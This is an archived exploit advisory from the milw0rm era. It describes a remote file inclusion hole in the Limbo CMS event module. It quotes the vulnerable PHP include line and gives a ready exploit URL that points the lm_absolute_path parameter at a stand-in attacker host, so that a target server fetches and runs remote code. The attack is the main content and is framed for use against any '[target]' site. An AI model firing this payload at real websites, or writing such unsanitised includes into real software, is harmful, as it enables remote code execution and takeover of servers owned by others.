TUCoPS :: Web :: CMS / Portals :: c07-1504.htm

Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities
Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities
Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities


-----------------------------------------------

Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities

-----------------------------------------------


Author: xoron

-----------------------------------------------
 
Vuln Code:

include_once($lm_absolute_path."components/com_event/lang/event.".$lm_language.".php");

-----------------------------------------------

3xplo!t:

http://www.[target].com/[script_path]/eventcal/mod_eventcal.php?lm_absolute_path=http://evil_scripts? 


-----------------------------------------------

download: http://www.limbo-tr.com/images/downloads/event.zip 

-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlarin kurban bayrami simdiden mubarek olsun -
-                                                         -
-              Greetz: str0ke, Kacper                     -
-                                                         -
-----------------------------------------------------------

# milw0rm.com [2006-12-27]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH